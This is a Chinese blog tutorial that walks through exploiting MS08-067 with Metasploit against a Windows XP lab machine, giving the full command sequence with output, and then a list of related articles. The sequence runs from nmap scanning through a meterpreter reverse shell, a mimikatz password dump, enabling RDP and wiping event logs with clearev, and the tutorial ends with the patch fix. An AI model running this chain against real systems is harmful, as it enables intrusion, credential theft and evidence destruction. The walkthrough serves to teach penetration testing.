Metasploit MS08-067 漏洞利用演示

最新推荐文章于 2024-07-11 22:58:31 发布
最新推荐文章于 2024-07-11 22:58:31 发布
阅读量2.7k 收藏 34
点赞数 2
分类专栏: kali 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36991248/article/details/112008181
版权

  • Metasploit MS08-067 漏洞利用演示

    • MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    • 原理解析:

      • 攻击者利用windows操作系统默认开放的SMB服务445端口发送恶意代码到目标主机,通过MSRPC接口调用Server服务的一个函数,溢出栈缓冲区,获得远程代码执行权限,从而完全控制主机Windows系统主要的网络服务程序。
      • SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
      • MSRPC网络服务
        • 这个服务能够完美的调用远程服务器上服务进程的过程。采用的网络传输层协议包括:
        • ncacn_ip_tcp  135
        • ncadg_ip_udp  135
        • ncacn_np  (TCP 139和445)主要是这个,SMB命名管道传输协议
      • server服务--支持计算机通过网络的文件、打印、和命名管道共享。如果服务停止,这些功能不可用。如果服务被禁用,任何直接依赖于此服务的服务将无法启动。

    • 漏洞利用演示

      • 演示环境

        • 靶机:Windows XP sp3 (192.168.2.6)
        • 攻击机:kali 2020 (192.168.2.3)

      • 1、首先测试一下在Kali上能够ping通靶机

      • 2、使用nmap扫描靶机是否存在MS08-067漏洞

        • nmap --script=vuln 192.168.2.6

      • 3、启动Metasploit

        • msfconsle

      • 4、搜索MS08-067的攻击模块

        • search ms8-067
        • 输出的信息一共包括6列,分别是#(模块编号)、Name(模块名称)、Disclosure Date(发布日期)、Rank(级别)、Check(是否支持检察)和Description(描述)。

      • 5、启用该攻击模块

        • use exploit/windows/smb/ms08_067_netapi

      • 6、显示攻击载荷

        • show payloads

      • 7、查看支持的目标系统

        • show targets

      • 8、设置攻击有效载荷

        • set payload windows/meterpreter/reverse_tcp

      • 9、查看Payload配置选项

        • show options
        • 输出的信息包括模块选项、Payload选项和利用的目标三部分。前两个选项信息分为四列,分别是Name(名称)、Current Setting(当前设置)、Required(需要)和Description(描述)。如果Required列的值为yes,则表示该项必须设置;如果为no,则可以不设置。

      • 10、设置RHOSTS选项

        • set RHOSTS 192.168.2.6

      • 11、实施渗透测试

        • exploit 或者 run

      • 12、Meterpreter

        • Meterpreter是Metasploit的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
        • 1)捕获屏幕
          • meterpreter > screenshot
          • Screenshot saved to: /root/diIxqzrL.jpeg
        • 2)上传/下载文件
          • meterpreter > upload 1.txt c:\\
          • meterpreter > download c:\\1.txt
        • 3)远程桌面
          • meterpreter > run vnc
        • 4)进入目标主机shell
          • meterpreter > shell
            • Process 960 created.
            • Channel 14 created.
            • Microsoft Windows XP [Version 5.1.2600]
            • (C) Copyright 1985-2001 Microsoft Corp.
          • C:\WINDOWS\system32>exit
            • exit
        • 5)获取用户密码
          • meterpreter > load mimikatz
            • Loading extension mimikatz...Success.
          • meterpreter > mimikatz_command -f sekurlsa::wdigest -a "full"
            • "0;70234","NTLM","ping","A-3326A091E7764","
            • ping,A-3326A091E7764,abc.123"
            • "0;997","Negotiate","LOCAL SERVICE","NT AUTHORITY",""
            • "0;996","Negotiate","NETWORK SERVICE","NT AUTHORITY","
            • A-3326A091E7764$,WORKGROUP,"
            • "0;45664","NTLM","","",""
            • "0;999","NTLM","A-3326A091E7764$","WORKGROUP",""
        • 6)启用远程桌面
          • meterpreter > run post/windows/manage/enable_rdp
            • [*] Enabling Remote Desktop
            • [*] RDP is disabled; enabling it ...
            • [*] Setting Terminal Services service startup mode
            • [*] The Terminal Services service is not set to auto, changing it to auto ...
            • [*] Opening port in local firewall if necessary
            • [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20201104235514_default_192.168.2.6_host.windows.cle_291746.txt
          • 查看远程用户的空闲时长
          • meterpreter > idletime
            • User has been idle for: 19 mins 23 secs
          • 使用rdesktop命令远程连接桌面
            • root@kali:~# rdesktop 192.168.2.6
              • Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
              • Clipboard(error): xclip_handle_SelectionNotify(), unable to find a textual target to satisfy RDP clipboard text request
        • 7)清除日志
          • meterpreter > clearev
            • [*] Wiping 48 records from Application...
            • [*] Wiping 63 records from System...
            • [*] Wiping 0 records from Security...

        • 8)解决方案

          • 升级到最新的Windows系统
          • 安装KB958644补丁
  •  
平邪
关注
专栏目录
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
Ms08-067 漏洞利用
weixin_37104668的博客
03-02 3814
MS08-067漏洞原理: MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢...
ms08-067 漏洞攻击(远程命令执行)
最新发布
m0_74062309的博客
07-11 552
老系统漏洞修复更新系统升级到最新的Windows系统,安装KB958644补丁。修改远程桌面默认端口,或关闭该服务学习如同播种,只要你辛勤耕耘,必将收获丰硕的果实,相信你的努力不会白费。
ms08-067漏洞利用
weixin_56291508的博客
11-29 619
kali利用ms08-067获取winxp权限
远程命令执行——MS08-067漏洞利用
wwwwyyyrre的博客
04-24 1215
漏洞是通过 MSRPC over SMB 通道调用 Server 服务程序中的 NetPathCanonicalize 函数时触发的,而 NetPathCanonicalize 函数在远程访问其他主机时,会调用 NetpwPathCanonicalize 函数,对远程访问的路径进行规范化,而在 NetpwPathCanonicalize 函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。因为在配置里,攻击机以及攻击端口都有所以不需要重新配置。
MS08-067 漏洞利用安全加固,高级网络安全程序员必会
2301_76190858的博客
04-03 1589
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。
利用win系统ms08-067漏洞.docx
10-26
在本实验中,我们将使用虚拟机_win2000和Kali Linux演示MS08-067漏洞的利用过程。首先,我们需要安装好_win2000虚拟机,并确保其网络设置正确。然后,我们需要安装Metasploit框架在Kali Linux中,以便我们可以使用...
Windows漏洞:MS08-067
Nanyeer的博客
03-21 1676
MS08-067漏洞(远程命令执行漏洞)的演示
经典的ms08_067 漏洞利用
play_science的博客
05-27 1902
ms08_067漏洞是smb服务的漏洞,而smb 服务是做什么的,很简单,他的一个经典使用方式就是共享文档(当然,这是windows里的服务内容),所以为了重现这个漏洞并让我们对其进行攻击,并取得控制权,就需要建立相关的网络环境。 我这使用的是虚拟机的方式建立,(原因嘛,当然是省电了)虚拟机软件virtul_box,虚拟机靶机我使用的是windows xp Sp 2 ,不知道是什么原因,我在sp3上面使用这个攻击方式并没有成功,可能已经加入了相关补丁吧。我使用的攻击机是parrot_linux(因为我觉得这
跨网段攻击+MS08-067漏洞复现
moreEFFORTmoreNB的博客
05-11 297
跨网段攻击+MS08-067漏洞复现
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8608
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
ms08067漏洞利用
05-16
漏洞利用只对xp 2000 .vista
MS08067漏洞利用分析报告
03-26
MS08067漏洞利用分析,主要通过两个虚拟机系统实现RPC调用,并通过该测试,完成攻击代码测试
MS08067漏洞完全利用动画+工具
10-30
这个漏洞不用多说了吧,利用价值比较大,实效性较强,欲下从速,估计过阵就没那么好用了,怕毒别下~好心上传还挨骂,早知道就不传了~谁知道怎么删掉自己的上传 MS08067漏洞完全利用动画+工具
MS08-067漏洞简谈与利用
qq_39120795的博客
11-11 4375
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 说明:微软安全公告KB958644 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 发布日期:2008/10/22 下载大小:因操作系统而异。 受影响的操作系统:Windows 2000;XP;Server 2003;Vi.
(菜鸟自学)Metasploit漏洞利用——ms08-067
nbdlsplyb的博客
01-20 1693
MS08-067 是指微软于2008年发布的一个安全漏洞(CVE-2008-4250)。该漏洞影响了 Windows 操作系统中的 Server Service,可被远程攻击者利用来执行任意代码,从而完全控制受影响的系统。这个漏洞主要影响 Windows 2000、Windows XP 和 Windows Server 2003 等早期版本的操作系统。攻击者可以通过发送特制的网络请求,利用该漏洞来执行恶意代码,从而取得对受感染计算机的完全控制权。
MS08_067漏洞详解
m0_64593235的博客
04-17 1027
MS08_067漏洞详解
利用MS08067远程溢出漏洞抓肉鸡
weixin_34365635的博客
12-01 447
利用MS08067远程溢出漏洞抓肉鸡 陈小兵 【antian365.com】    微软的正版验证机会出来以后没有多久,就爆出针对台湾和简体中文版本的MS08067漏洞,这个时候微软主动爆出这个号称比冲击波还要厉害的漏洞,是否针对我国,很多人都在怀疑,万事讲究证据,没有证据,也只能猜测!不过武器在别人手中,想怎么玩你,就怎么玩你!很多专家也对微软提供的更新中是否保护***,诸如下载者等等表示怀...
Metasploit 渗透测试四 | MS08-067漏洞利用
LALAAYANG的博客
10-30 645
Metasploit 渗透测试四 | MS08-067漏洞利用问题概述执行过程 问题概述 利用MS08-067漏洞,获得目标节点远程访问权限,并试图植入开机启动的后门。 执行过程 设置攻击参数: 开始攻击: 成功获取shell: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值